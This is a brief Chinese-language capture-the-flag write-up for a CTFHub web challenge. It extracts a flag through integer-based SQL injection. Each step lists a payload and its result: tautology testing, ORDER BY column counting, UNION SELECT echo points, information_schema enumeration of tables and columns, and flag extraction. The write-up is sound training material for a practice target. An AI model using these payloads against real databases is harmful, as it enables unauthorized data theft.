CTFHub_2017-赛客夏令营-Web-injection（常规sql注入）

启动靶场，显示如下

根据题目名与url中的GET传参判断应该为注入

1.判断为整形注入
输入'（单引号）        --无回显
输入1 or 1=1        --有回显

2.尝试查看列数，判断有2列
1 order by 2        --有回显
1 order by 3        --无回显

3.判断其回显点位
1111 union select 1,2    --回显2

4.查询当前数据库名
1111 union select 1,database()  --回显ctfhub

5.查询表名
1111 union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctfhub'   --回显flag,info

6.查询列名
1111 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'   --回显flag

7.查询flag列中的内容
id=1111 union select 1,flag from ctfhub.flag